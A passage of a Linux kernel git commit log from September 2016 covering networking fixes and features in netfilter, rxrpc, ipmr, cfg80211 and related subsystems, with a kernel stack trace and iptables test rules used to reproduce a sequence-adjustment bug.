Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-09-27 21:06:21 -04:00
Ke Wang
77b00bc037 sunrpc: queue work on system_power_efficient_wq
sunrpc uses workqueue to clean cache regulary. There is no real dependency
of executing work on the cpu which queueing it.

On a idle system, especially for a heterogeneous systems like big.LITTLE,
it is observed that the big idle cpu was woke up many times just to service
this work, which against the principle of power saving. It would be better
if we can schedule it on a cpu which the scheduler believes to be the most
appropriate one.

After apply this patch, system_wq will be replaced by
system_power_efficient_wq for sunrpc. This functionality is enabled when
CONFIG_WQ_POWER_EFFICIENT is selected.

Signed-off-by: Ke Wang <ke.wang@spreadtrum.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-27 14:35:36 -04:00
Yotam Gigi
c006da0be0 act_ife: Fix false encoding
On ife encode side, the action stores the different tlvs inside the ife
header, where each tlv length field should refer to the length of the
whole tlv (without additional padding) and not just the data length.

On ife decode side, the action iterates over the tlvs in the ife header
and parses them one by one, where in each iteration the current pointer is
advanced according to the tlv size.

Before, the encoding encoded only the data length inside the tlv, which led
to false parsing of ife the header. In addition, due to the fact that the
loop counter was unsigned, it could lead to infinite parsing loop.

This fix changes the loop counter to be signed and fixes the encoding to
take into account the tlv type and size.

Fixes: 28a10c426e ("net sched: fix encoding to use real length")
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Yotam Gigi <yotamg@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-27 09:53:17 -04:00
Yotam Gigi
4b1d488a28 act_ife: Fix external mac header on encode
On ife encode side, external mac header is copied from the original packet
and may be overridden if the user requests. Before, the mac header copy
was done from memory region that might not be accessible anymore, as
skb_cow_head might free it and copy the packet. This led to random values
in the external mac header once the values were not set by user.

This fix takes the internal mac header from the packet, after the call to
skb_cow_head.

Fixes: ef6980b6be ("net sched: introduce IFE action")
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Yotam Gigi <yotamg@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-27 09:53:16 -04:00
Jorgen Hansen
1190cfdb1a VSOCK: Don't dec ack backlog twice for rejected connections
If a pending socket is marked as rejected, we will decrease the
sk_ack_backlog twice. So don't decrement it for rejected sockets
in vsock_pending_work().

Testing of the rejected socket path was done through code
modifications.

Reported-by: Stefan Hajnoczi <stefanha@redhat.com>
Signed-off-by: Jorgen Hansen <jhansen@vmware.com>
Reviewed-by: Adit Ranadive <aditr@vmware.com>
Reviewed-by: Aditya Sarwade <asarwade@vmware.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-27 07:59:25 -04:00
Johannes Berg
8564e38206 cfg80211: add checks for beacon rate, extend to mesh
The previous commit added support for specifying the beacon rate
for AP mode. Add features checks to this, and extend it to also
support the rate configuration for mesh networks. For IBSS it's
not as simple due to joining etc., so that's not yet supported.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-26 10:23:48 +02:00
Purushottam Kushwaha
a7c7fbff6a cfg80211: Add support to configure a beacon data rate
This allows an option to configure a single beacon tx rate for an AP.

Signed-off-by: Purushottam Kushwaha <pkushwah@qti.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-26 10:23:48 +02:00
David S. Miller
71527eb2be Merge branch 'for-upstream' of git://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next
Johan Hedberg says:

====================
pull request: bluetooth-next 2016-09-25

Here are a few more Bluetooth & 802.15.4 patches for the 4.9 kernel that
have popped up during the past week:

 - New USB ID for QCA_ROME Bluetooth device
 - NULL pointer dereference fix for Bluetooth mgmt sockets
 - Fixes for BCSP driver
 - Fix for updating LE scan response

Please let me know if there are any issues pulling. Thanks.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-25 23:52:22 -04:00
Nikolay Aleksandrov
2cf750704b ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route
Since the commit below the ipmr/ip6mr rtnl_unicast() code uses the portid
instead of the previous dst_pid which was copied from in_skb's portid.
Since the skb is new the portid is 0 at that point so the packets are sent
to the kernel and we get scheduling while atomic or a deadlock (depending
on where it happens) by trying to acquire rtnl two times.
Also since this is RTM_GETROUTE, it can be triggered by a normal user.

Here's the sleeping while atomic trace:
[ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
[ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
[ 7858.212881] 2 locks held by swapper/0/0:
[ 7858.213013]  #0:  (((&mrt->ipmr_expire_timer))){+.-...}, at: [<ffffffff810fbbf5>] call_timer_fn+0x5/0x350
[ 7858.213422]  #1:  (mfc_unres_lock){+.....}, at: [<ffffffff8161e005>] ipmr_expire_process+0x25/0x130
[ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
[ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
[ 7858.214108]  0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
[ 7858.214412]  ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
[ 7858.214716]  000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
[ 7858.215251] Call Trace:
[ 7858.215412]  <IRQ>  [<ffffffff813a7804>] dump_stack+0x85/0xc1
[ 7858.215662]  [<ffffffff810a4a72>] ___might_sleep+0x192/0x250
[ 7858.215868]  [<ffffffff810a4b9f>] __might_sleep+0x6f/0x100
[ 7858.216072]  [<ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
[ 7858.216279]  [<ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
[ 7858.216487]  [<ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
[ 7858.216687]  [<ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
[ 7858.216900]  [<ffffffff81573c70>] rtnl_unicast+0x20/0x30
[ 7858.217128]  [<ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
[ 7858.217351]  [<ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
[ 7858.217581]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217785]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217990]  [<ffffffff810fbc95>] call_timer_fn+0xa5/0x350
[ 7858.218192]  [<ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
[ 7858.218415]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.218656]  [<ffffffff810fde10>] run_timer_softirq+0x260/0x640
[ 7858.218865]  [<ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
[ 7858.219068]  [<ffffffff816637c8>] __do_softirq+0xe8/0x54f
[ 7858.219269]  [<ffffffff8107a948>] irq_exit+0xb8/0xc0
[ 7858.219463]  [<ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
[ 7858.219678]  [<ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
[ 7858.219897]  <EOI>  [<ffffffff81055f16>] ? native_safe_halt+0x6/0x10
[ 7858.220165]  [<ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
[ 7858.220373]  [<ffffffff810298e3>] default_idle+0x23/0x190
[ 7858.220574]  [<ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
[ 7858.220790]  [<ffffffff810c9f8c>] default_idle_call+0x4c/0x60
[ 7858.221016]  [<ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
[ 7858.221257]  [<ffffffff8164f995>] rest_init+0x135/0x140
[ 7858.221469]  [<ffffffff81f83014>] start_kernel+0x50e/0x51b
[ 7858.221670]  [<ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
[ 7858.221894]  [<ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
[ 7858.222113]  [<ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a

Fixes: 2942e90050 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-25 23:41:39 -04:00
Pablo Neira Ayuso
f20fbc0717 Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next
Conflicts:
	net/netfilter/core.c
	net/netfilter/nf_tables_netdev.c

Resolve two conflicts before pull request for David's net-next tree:

1) Between c73c248490 ("netfilter: nf_tables_netdev: remove redundant
   ip_hdr assignment") from the net tree and commit ddc8b6027a
   ("netfilter: introduce nft_set_pktinfo_{ipv4, ipv6}_validate()").

2) Between e8bffe0cf9 ("net: Add _nf_(un)register_hooks symbols") and
   Aaron Conole's patches to replace list_head with single linked list.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:34:19 +02:00
Liping Zhang
8cb2a7d566 netfilter: nf_log: get rid of XT_LOG_* macros
nf_log is used by both nftables and iptables, so use XT_LOG_XXX macros
here is not appropriate. Replace them with NF_LOG_XXX.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:16:45 +02:00
Liping Zhang
ff107d2776 netfilter: nft_log: complete NFTA_LOG_FLAGS attr support
NFTA_LOG_FLAGS attribute is already supported, but the related
NF_LOG_XXX flags are not exposed to the userspace. So we cannot
explicitly enable log flags to log uid, tcp sequence, ip options
and so on, i.e. such rule "nft add rule filter output log uid"
is not supported yet.

So move NF_LOG_XXX macro definitions to the uapi/../nf_log.h. In
order to keep consistent with other modules, change NF_LOG_MASK to
refer to all supported log flags. On the other hand, add a new
NF_LOG_DEFAULT_MASK to refer to the original default log flags.

Finally, if user specify the unsupported log flags or NFTA_LOG_GROUP
and NFTA_LOG_FLAGS are set at the same time, report EINVAL to the
userspace.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:16:43 +02:00
Pablo Neira Ayuso
0f3cd9b369 netfilter: nf_tables: add range expression
Inverse ranges != [a,b] are not currently possible because rules are
composites of && operations, and we need to express this:

	data < a || data > b

This patch adds a new range expression. Positive ranges can be already
through two cmp expressions:

	cmp(sreg, data, >=)
	cmp(sreg, data, <=)

This new range expression provides an alternative way to express this.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:16:42 +02:00
KOVACS Krisztian
7a682575ad netfilter: xt_socket: fix transparent match for IPv6 request sockets
The introduction of TCP_NEW_SYN_RECV state, and the addition of request
sockets to the ehash table seems to have broken the --transparent option
of the socket match for IPv6 (around commit a9407000).

Now that the socket lookup finds the TCP_NEW_SYN_RECV socket instead of the
listener, the --transparent option tries to match on the no_srccheck flag
of the request socket.

Unfortunately, that flag was only set for IPv4 sockets in tcp_v4_init_req()
by copying the transparent flag of the listener socket. This effectively
causes '-m socket --transparent' not match on the ACK packet sent by the
client in a TCP handshake.

Based on the suggestion from Eric Dumazet, this change moves the code
initializing no_srccheck to tcp_conn_request(), rendering the above
scenario working again.

Fixes: a940700003 ("netfilter: xt_socket: prepare for TCP_NEW_SYN_RECV support")
Signed-off-by: Alex Badics <alex.badics@balabit.com>
Signed-off-by: KOVACS Krisztian <hidden@balabit.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:16:11 +02:00
Florian Westphal
58e207e498 netfilter: evict stale entries when user reads /proc/net/nf_conntrack
Fabian reports a possible conntrack memory leak (could not reproduce so
far), however, one minor issue can be easily resolved:

> cat /proc/net/nf_conntrack | wc -l = 5
> 4 minutes required to clean up the table.

We should not report those timed-out entries to the user in first place.
And instead of just skipping those timed-out entries while iterating over
the table we can also zap them (we already do this during ctnetlink
walks, but I forgot about the /proc interface).

Fixes: f330a7fdbe ("netfilter: conntrack: get rid of conntrack timer")
Reported-by: Fabian Frederick <fabf@skynet.be>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:08 +02:00
Vishwanath Pai
11d5f15723 netfilter: xt_hashlimit: Create revision 2 to support higher pps rates
Create a new revision for the hashlimit iptables extension module. Rev 2
will support higher pps of upto 1 million, Version 1 supports only 10k.

To support this we have to increase the size of the variables avg and
burst in hashlimit_cfg to 64-bit. Create two new structs hashlimit_cfg2
and xt_hashlimit_mtinfo2 and also create newer versions of all the
functions for match, checkentry and destroy.

Some of the functions like hashlimit_mt, hashlimit_mt_check etc are very
similar in both rev1 and rev2 with only minor changes, so I have split
those functions and moved all the common code to a *_common function.

Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Joshua Hunt <johunt@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:06 +02:00
Vishwanath Pai
0dc60a4546 netfilter: xt_hashlimit: Prepare for revision 2
I am planning to add a revision 2 for the hashlimit xtables module to
support higher packets per second rates. This patch renames all the
functions and variables related to revision 1 by adding _v1 at the
end of the names.

Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Joshua Hunt <johunt@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:05 +02:00
Liping Zhang
7bfdde7045 netfilter: nft_ct: report error if mark and dir specified simultaneously
NFT_CT_MARK is unrelated to direction, so if NFTA_CT_DIRECTION attr is
specified, report EINVAL to the userspace. This validation check was
already done at nft_ct_get_init, but we missed it in nft_ct_set_init.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:04 +02:00
Liping Zhang
d767ff2c84 netfilter: nft_ct: unnecessary to require dir when use ct l3proto/protocol
Currently, if the user want to match ct l3proto, we must specify the
direction, for example:
  # nft add rule filter input ct original l3proto ipv4
                                 ^^^^^^^^
Otherwise, error message will be reported:
  # nft add rule filter input ct l3proto ipv4
  nft add rule filter input ct l3proto ipv4
  <cmdline>:1:1-38: Error: Could not process rule: Invalid argument
  add rule filter input ct l3proto ipv4
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Actually, there's no need to require NFTA_CT_DIRECTION attr, because
ct l3proto and protocol are unrelated to direction.

And for compatibility, even if the user specify the NFTA_CT_DIRECTION
attr, do not report error, just skip it.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:02 +02:00
Gao Feng
8d11350f5f netfilter: seqadj: Fix the wrong ack adjust for the RST packet without ack
It is valid that the TCP RST packet which does not set ack flag, and bytes
of ack number are zero. But current seqadj codes would adjust the "0" ack
to invalid ack number. Actually seqadj need to check the ack flag before
adjust it for these RST packets.

The following is my test case

client is 10.26.98.245, and add one iptable rule:
iptables  -I INPUT -p tcp --sport 12345 -m connbytes --connbytes 2:
--connbytes-dir reply --connbytes-mode packets -j REJECT --reject-with
tcp-reset
This iptables rule could generate on TCP RST without ack flag.

server:10.172.135.55
Enable the synproxy with seqadjust by the following iptables rules
iptables -t raw -A PREROUTING -i eth0 -p tcp -d 10.172.135.55 --dport 12345
-m tcp --syn -j CT --notrack

iptables -A INPUT -i eth0 -p tcp -d 10.172.135.55 --dport 12345 -m conntrack
--ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7
--mss 1460
iptables -A OUTPUT -o eth0 -p tcp -s 10.172.135.55 --sport 12345 -m conntrack
--ctstate INVALID,UNTRACKED -m tcp --tcp-flags SYN,RST,ACK SYN,ACK -j ACCEPT

The following is my test result.

1. packet trace on client
root@routers:/tmp# tcpdump -i eth0 tcp port 12345 -n
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [S], seq 3695959829,
win 29200, options [mss 1460,sackOK,TS val 452367884 ecr 0,nop,wscale 7],
length 0
IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [S.], seq 546723266,
ack 3695959830, win 0, options [mss 1460,sackOK,TS val 15643479 ecr 452367884,
nop,wscale 7], length 0
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [.], ack 1, win 229,
options [nop,nop,TS val 452367885 ecr 15643479], length 0
IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [.], ack 1, win 226,
options [nop,nop,TS val 15643479 ecr 452367885], length 0
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [R], seq 3695959830,
win 0, length 0

2. seqadj log on server
[62873.867319] Adjusting sequence number from 602341895->546723267,
ack from 3695959830->3695959830
[62873.867644] Adjusting sequence number from 602341895->546723267,
ack from 3695959830->3695959830
[62873.869040] Adjusting sequence number from 3695959830->3695959830,
ack from 0->55618628

To summarize, it is clear that the seqadj codes adjust the 0 ack when receive
one TCP RST packet without ack.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:01 +02:00
Aaron Conole
e3b37f11e6 netfilter: replace list_head with single linked list
The netfilter hook list never uses the prev pointer, and so can be trimmed to
be a simple singly-linked list.

In addition to having a more light weight structure for hook traversal,
struct net becomes 5568 bytes (down from 6400) and struct net_device becomes
2176 bytes (down from 2240).

Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:38:48 +02:00
David S. Miller
21445c91dc RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV+cFjvSw1s6N8H32AQIRyBAAkedosPtgW2JBsCEgvYcfQuSg36gBc0Km
 ozAcbzbWA50P+WSdIq+GhcnQLo3OWRsaGKp6vIrgDtJjgKZXQJyOwzlMm6xFf0A+
 Z7NtnWHuSZ90xcxVHCqXRqdNGqwmve8VTNWUbQmZpKIc6d6wNiO3rsg/WFTshroz
 FSMf67PsOf5i1hCR8x+3dPlSdkIjH/hWh3wyEmmnPjDPq49twnKkaklLylf9V9NO
 DGuW+/+wxkht3ylPRxGD7IQ1t0eA9iyU59Zk7SizuEmzrUNQrqQ3RM8ZsBe/cAA8
 VEr+RVOvVoxWUYnZbYEvwfwuKQIWhX5ptt6VLQH7sLJlR8AiMIV6/K47ZqK7ILoI
 xBlkQAxI5K4SdFkOux7JPZ31yrIQMTl5xAUkbZxQOFsIPh237mtvGatUIKYcKyi6
 uURrPtm13C1uqBZ+sfiUcjq82YdnLkliTUvUncarjZjUAddncQaSOwxcXZGCxThE
 24JAzBAJfWLn0760SzNDZytcWSU4tpLVI3X+FpujtaF447DfjzJ/NdyBXWXbmOyY
 ubX3pk0UOHVj5kMr7WXK5c+txOI2qIH4aV8cYZpVsFAXp63WjqgfRvRbNhICUA86
 3v2M/qLgAEFR3rYh9i+mm0D74aug0+NwST/QDtf5dYFiH53+BteEpQqd/kcYxt8m
 6bWwKxzUQG0=
 =PTOG
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160924' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Implement slow-start and other bits

This set of patches implements the RxRPC slow-start feature for AF_RXRPC to
improve performance and handling of occasional packet loss.  This is more or
less the same as TCP slow start [RFC 5681].  Firstly, there are some ACK
generation improvements:

 (1) Send ACKs regularly to apprise the peer of our state so that they can do
     congestion management of their own.

 (2) Send an ACK when we fill in a hole in the buffer so that the peer can
     find out that we did this thus forestalling retransmission.

 (3) Note the final DATA packet's serial number in the final ACK for
     correlation purposes.

and a couple of bug fixes:

 (4) Reinitialise the ACK state and clear the ACK and resend timers upon
     entering the client reply reception phase to kill off any pending probe
     ACKs.

 (5) Delay the resend timer to allow for nsec->jiffies conversion errors.

and then there's the slow-start pieces:

 (6) Summarise an ACK.

 (7) Schedule a PING or IDLE ACK if the reply to a client call is overdue to
     try and find out what happened to it.

 (8) Implement the slow start feature.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-25 05:56:05 -04:00
Lance Richardson
c2675de447 gre: use nla_get_be32() to extract flowinfo
Eliminate a sparse endianness mismatch warning, use nla_get_be32() to
extract a __be32 value instead of nla_get_u32().

Signed-off-by: Lance Richardson <lrichard@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 20:07:44 -04:00
David Howells
57494343cb rxrpc: Implement slow-start
Implement RxRPC slow-start, which is similar to RFC 5681 for TCP.  A
tracepoint is added to log the state of the congestion management algorithm
and the decisions it makes.

Notes:

 (1) Since we send fixed-size DATA packets (apart from the final packet in
     each phase), counters and calculations are in terms of packets rather
     than bytes.

 (2) The ACK packet carries the equivalent of TCP SACK.

 (3) The FLIGHT_SIZE calculation in RFC 5681 doesn't seem particularly
     suited to SACK of a small number of packets.  It seems that, almost
     inevitably, by the time three 'duplicate' ACKs have been seen, we have
     narrowed the loss down to one or two missing packets, and the
     FLIGHT_SIZE calculation ends up as 2.

 (4) In rxrpc_resend(), if there was no data that apparently needed
     retransmission, we transmit a PING ACK to ask the peer to tell us what
     its Rx window state is.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
0d967960d3 rxrpc: Schedule an ACK if the reply to a client call appears overdue
If we've sent all the request data in a client call but haven't seen any
sign of the reply data yet, schedule an ACK to be sent to the server to
find out if the reply data got lost.

If the server hasn't yet hard-ACK'd the request data, we send a PING ACK to
demand a response to find out whether we need to retransmit.

If the server says it has received all of the data, we send an IDLE ACK to
tell the server that we haven't received anything in the receive phase as
yet.

To make this work, a non-immediate PING ACK must carry a delay.  I've chosen
the same as the IDLE ACK for the moment.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
31a1b98950 rxrpc: Generate a summary of the ACK state for later use
Generate a summary of the Tx buffer packet state when an ACK is received
for use in a later patch that does congestion management.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
df0562a72d rxrpc: Delay the resend timer to allow for nsec->jiffies conv error
When determining the resend timer value, we have a value in nsec but the
timer is in jiffies which may be a million or more times more coarse.
nsecs_to_jiffies() rounds down - which means that the resend timeout
expressed as jiffies is very likely earlier than the one expressed as
nanoseconds from which it was derived.

The problem is that rxrpc_resend() gets triggered by the timer, but can't
then find anything to resend yet.  It sets the timer again - but gets
kicked off immediately again and again until the nanosecond-based expiry
time is reached and we actually retransmit.

Fix this by adding 1 to the jiffies-based resend_at value to counteract the
rounding and make sure that the timer happens after the nanosecond-based
expiry is passed.

Alternatives would be to adjust the timestamp on the packets to align
with the jiffie scale or to switch back to using jiffie-timestamps.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
dd7c1ee59a rxrpc: Reinitialise the call ACK and timer state for client reply phase
Clear the ACK reason, ACK timer and resend timer when entering the client
reply phase when the first DATA packet is received.  New ACKs will be
proposed once the data is queued.

The resend timer is no longer relevant and we need to cancel ACKs scheduled
to probe for a lost reply.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
b69d94d799 rxrpc: Include the last reply DATA serial number in the final ACK
In a client call, include the serial number of the last DATA packet of the
reply in the final ACK.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
a7056c5ba6 rxrpc: Send an immediate ACK if we fill in a hole
Send an immediate ACK if we fill in a hole in the buffer left by an
out-of-sequence packet.  This may allow the congestion management in the peer
to avoid a retransmission if packets got reordered on the wire.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
Aaron Conole
d4bb5caa9c netfilter: Only allow sane values in nf_register_net_hook
This commit adds an upfront check for sane values to be passed when
registering a netfilter hook.  This will be used in a future patch for a
simplified hook list traversal.

Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:30:19 +02:00
Aaron Conole
e2361cb90a netfilter: Remove explicit rcu_read_lock in nf_hook_slow
All of the callers of nf_hook_slow already hold the rcu_read_lock, so this
cleanup removes the recursive call.  This is just a cleanup, as the locking
code gracefully handles this situation.

Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:29:53 +02:00
Aaron Conole
2c1e2703ff netfilter: call nf_hook_ingress with rcu_read_lock
This commit ensures that the rcu read-side lock is held while the
ingress hook is called.  This ensures that a call to nf_hook_slow (and
ultimately nf_ingress) will be read protected.

Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:25:49 +02:00
Florian Westphal
c5136b15ea netfilter: bridge: add and use br_nf_hook_thresh
This replaces the last uses of NF_HOOK_THRESH().
Followup patch will remove it and rename nf_hook_thresh.

The reason is that inet (non-bridge) netfilter no longer invokes the
hooks from hooks, so we do no longer need the thresh value to skip hooks
with a lower priority.

The bridge netfilter however may need to do this. br_nf_hook_thresh is a
wrapper that is supposed to do this, i.e. only call hooks with a
priority that exceeds NF_BR_PRI_BRNF.

It's used only in the recursion cases of br_netfilter.  It invokes
nf_hook_slow while holding an rcu read-side critical section to make a
future cleanup simpler.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:25:48 +02:00
Gao Feng
50f4c7b73f netfilter: xt_TCPMSS: Refactor the codes to decrease one condition check and more readable
The origin codes perform two condition checks with dst_mtu(skb_dst(skb))
and in_mtu. And the last statement is "min(dst_mtu(skb_dst(skb)),
in_mtu) - minlen". It may let reader think about how about the result.
Would it be negative.

Now assign the result of min(dst_mtu(skb_dst(skb)), in_mtu) to a new
variable, then only perform one condition check, and it is more readable.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:13:21 +02:00
David Howells
805b21b929 rxrpc: Send an ACK after every few DATA packets we receive
Send an ACK if we haven't sent one for the last two packets we've received.
This keeps the other end apprised of where we've got to - which is
important if they're doing slow-start.

We do this in recvmsg so that we can dispatch a packet directly without the
need to wake up the background thread.

This should possibly be made configurable in future.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 18:05:26 +01:00
Lance Richardson
db32e4e49c ip6_gre: fix flowi6_proto value in ip6gre_xmit_other()
Similar to commit 3be07244b7 ("ip6_gre: fix flowi6_proto value in
xmit path"), set flowi6_proto to IPPROTO_GRE for output route lookup.

Up until now, ip6gre_xmit_other() has set flowi6_proto to a bogus value.
This affected output route lookup for packets sent on an ip6gretap device
in cases where routing was dependent on the value of flowi6_proto.

Since the correct proto is already set in the tunnel flowi6 template via
commit 252f3f5a11 ("ip6_gre: Set flowi6_proto as IPPROTO_GRE in xmit
path."), simply delete the line setting the incorrect flowi6_proto value.

Suggested-by: Jiri Benc <jbenc@redhat.com>
Fixes: c12b395a46 ("gre: Support GRE over IPv6")
Reviewed-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 09:44:31 -04:00
David S. Miller
2a9aa41fd2 RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV+VA9/Sw1s6N8H32AQJufQ//bP1Aq6Ej+3km0o+S1w2lEl7kc1Gnown+
 PLKecg73rtMLEXDCJPKrh/OjGBX1GFaPC5HXWF/4TRav3/qjsi2/P7MSIYbt8ZAk
 0kVcdpIU1RWrPFt0tdhxTDSgPMhRWaKJTFV0CwQgnCqeyrVX44syx42B941Wsgcs
 N/6ANRr1qFLTwT1LKD0EhRWxnds1YI9WPgF5huaAn5RHpymCynwxsxyTDdU+NL0j
 YE75o5rjUzAZzMk5xrTjO8yd7xjUfjO7xT/CzjjVfXB4TOBmYExfOrLNZX0vOPPr
 LBOj3LTLwklWtx5/RJGe3A4y1+yfiUYGTu90ArARHUxP6AMwnxztvjuy2MQvBOgP
 xTlHcEOPoHrxxfIGdJH/0NRl1zgn6IF2lFOH3EgRcw8hzMdFp46AXV74ckst1vOQ
 LsqTbhndG2vkVFV8uZCZO7om0HRbpxbvy6+hEakdZ6k9kJA3amezS6Q8wiXxGhAE
 0wBns3XI/75Zd7QyXRkcHl3iUqS5uW0dKmAqitIlgf3CUsr4cZFlHO8IDD3rkTFD
 WbnvFhaL9Ee5IQjbsHgyzqPSI7sUJUYG1xBAz8wIWnjD0bGu5b/QzgdBSCVIFJ3e
 bNvpe1B6HEHj0EyIj1wK2H8311Y4lPNeJlOj7BDUqqRIZW8vviG26MTGML6GnJwU
 L35wa/s4ebo=
 =+8HJ
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160923' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Bug fixes and tracepoints

Here are a bunch of bug fixes:

 (1) Need to set the timestamp on a Tx packet before queueing it to avoid
     trouble with the retransmission function.

 (2) Don't send an ACK at the end of the service reply transmission; it's
     the responsibility of the client to send an ACK to close the call.
     The service can resend the last DATA packet or send a PING ACK.

 (3) Wake sendmsg() on abnormal call termination.

